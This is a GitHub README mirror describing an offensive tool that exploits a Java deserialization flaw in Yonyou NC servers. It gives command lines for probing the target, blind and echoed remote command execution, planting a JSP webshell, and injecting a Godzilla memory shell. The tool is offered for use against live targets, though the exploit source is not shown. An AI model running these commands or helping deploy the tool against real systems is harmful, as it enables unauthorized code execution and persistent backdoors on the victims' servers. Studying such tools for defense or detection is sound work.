GithubHelp home page GithubHelp logo

yongyounc-unserialize-tools's Introduction

使用说明

  1. 前言

无回显的构造链直接使用的是 CC6执行命令,回显的构造链使用了DefiningClassLoader来绕过默认的黑名单,然后结合 CC6构造链进行任意代码执行。

搭配了接口检测功能和URLDNS构造链判断是否存在反序列化。

  1. 接口检查功能:java -jar nc6.5.jar http://127.0.0.1 Check

image-20220830130453464

  1. URLDNS构造链探测:java -jar nc6.5.jar http://127.0.0.1 urldns http://123.dnslog.cn

image-20220830130719543

image-20220830130803567

image-20220830130825740

  1. 无回显命令执行:java -jar yonyouNCTools.jar http://192.168.222.130 blind calc.exe

image-20220830131753990

image-20220830131804456

image-20220830131717673

  1. 回显命令执行:java -jar yonyouNCTools.jar http://192.168.222.130 Execute,通过 Header头传递命令。

image-20220830131939577

image-20220830142505411

  1. 落地 webshelljava -jar yonyouNCTools.jar http://192.168.222.130 UploadShell "C:\Users\Administrator\Pictures\Camera Roll\1.jsp"

此处如果使用 java1.8运行,固定落地一个天蝎的 webshell,路径为:http://127.0.0.1/eozZEwBb.jsp,如果使用的是 java1.7运行,会重新动态编译,可以落地自定义的 webshell,路径随机。

image-20220830132251387

image-20220830132618115

image-20220830132628494

image-20220830132824210

通过 java1.7落地自定义的 webshell,因为用到了动态编译,所有需要使用 jre下的 java.exe运行,否则动态编译失败。动态编译过程会提示使用了过时的 API,没有影响。

image-20220830133136817

image-20220830133235224

image-20220830133344521

image-20220830133403240

image-20220830133536619

  1. 注入内存马:java -jar yonyouNCTools.jar http://192.168.222.130 MemoryShell,注入的是一个 valve-Godzilla内存马。

image-20220830133637610

image-20220830133805235

image-20220830133847158

image-20220830134116523

yongyounc-unserialize-tools's People

Contributors

ghost2097221 avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

thelostworldfree expzhizhuo cser18 wuha0926 r00t7oo2jm kk-hub446 dk47os3r getcode2git chased9166 secjia m0s30 klinklinklin 5l1v3r1 warren-jace du1ge mobaxtermx wilsonleeee bbbfkl functfan safe3s h30gyan lay0us1 ssjt21 samy1937 hughink ccqtv123 ktessi libraggbond guanglianniubi dr-s1x17 anguvia freefv 30579096 ishtarcc sec-fork york-cmd kasjhkjasd hackerxj007 superneilcn 726232111 savior-only ling1uan zhuxi1965 werwolfz times0ng webvul allblue147 503744399

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.